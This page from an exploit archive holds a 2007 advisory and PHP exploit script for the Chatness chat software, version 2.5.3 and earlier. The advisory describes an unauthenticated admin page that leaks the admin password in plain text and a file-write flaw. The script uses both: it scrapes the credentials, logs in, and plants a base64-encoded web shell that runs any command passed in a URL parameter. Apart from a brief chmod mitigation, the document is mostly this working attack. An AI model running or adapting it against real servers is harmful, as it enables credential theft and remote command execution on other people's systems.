Home / exploitsPDF  

chatness253-multi.txt

Posted on 13 April 2007

<?/* Files: options.php, save.php Affects: Chatness <= 2.5.3 Date: 12th April 2007 Issue Description: =========================================================================== Chatness suffers with two main vulnerabilities, the first of these in /admin/options.php the problems occur because the script first fails to verify if the user is in fact an administrator and secondly it prints the administrators username and password in plain text as part of the pre-filled form. The second issue occurs in /admin/save.php and /index.php while save.php limits writing to just .html extended filenames it is possible for an attacker to overwrite either foot.html or head.html to contain arbitrary php code which would then be executed when included by index.php =========================================================================== Scope: =========================================================================== Combined these two seperate issues will allow an attacker to gain access to the system and execute code/commands of their choice. =========================================================================== Recommendation: =========================================================================== Until a patch is availible it would be advisable to chmod both foot.html and head.html to a mode that makes them unwritable by the web server, this will minimize the risk of arbitrary code execution. =========================================================================== Discovered By: Gammarays */?> <?php echo "######################################################## "; echo "# Special Greetings To - Timq,Warpboy,The-Maggot # "; echo "######################################################## "; $payload = "JTNDJTNGcGhwK2lmJTI4aXNzZXQlMjglMjRfR0VUJTVCJTI3Y21kJTI3JTVEJTI5JTI5JTdCZWNobytzaGVsbF9leGVjJTI4dXJsZGVjb2RlJTI4JTI0X0dFVCU1QiUyN2NtZCUyNyU1RCUyOSUyOSUzQmRpZSUyOCUyOSUzQiU3RCUzRiUzRQ=="; $payload = base64_decode($payload); if($argc!=2) die("Usage: <url> Ex: http://www.example.com/chatness/ "); $url = $argv[1]; $ch = curl_init($url . "admin/options.php"); if(!$ch) die("Error Initializing CURL"); echo "[ ] Attempting To Fetch Admin Login... "; curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $res = curl_exec($ch); if(!$res) die("Error Connecting To Target"); $httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE); if($httpresult!=200) die("Error - URL Appears To Be Incorrect"); //Not good - but it works...sometimes $junkarray = explode("id=",$res); $junkarray = explode(""",$junkarray[14]); $username = $junkarray[3]; $junkarray = explode("id=",$res); $junkarray = explode(""",$junkarray[15]); $password = $junkarray[3]; echo "[ ] Found Username And Password - ".$username." / ".$password." "; echo "[ ] Logging In... "; //Login curl_setopt($ch, CURLOPT_URL,$url . "admin/login.php"); curl_setopt($ch, CURLOPT_COOKIEJAR, "mrcookie.dat"); curl_setopt($ch, CURLOPT_POST,1); curl_setopt($ch, CURLOPT_POSTFIELDS,"user=".$username."&pass=".$password."&submit=Login"); $res = curl_exec($ch); if(!res) die("Error Connecting To Target"); $httpresult = curl_getinfo($ch,CURLINFO_HTTP_CODE); if($httpresult==200) die("Error Invalid Username/Password"); echo "[ ] Login Succeeded.. "; //Deploy Main Payload curl_setopt($ch, CURLOPT_URL,$url . "admin/save.php?file=head"); curl_setopt($ch, CURLOPT_COOKIEFILE, "mrcookie.dat"); curl_setopt($ch, CURLOPT_POSTFIELDS,"html=".$payload); $res = curl_exec($ch); if(!res) die("Error Connecting To Target"); echo "[ ] Payload Deployed "; echo "[ ] Shell Accessible at ".$url."index.php?cmd=<yourcommand>"; curl_close($ch); ?>

 

TOP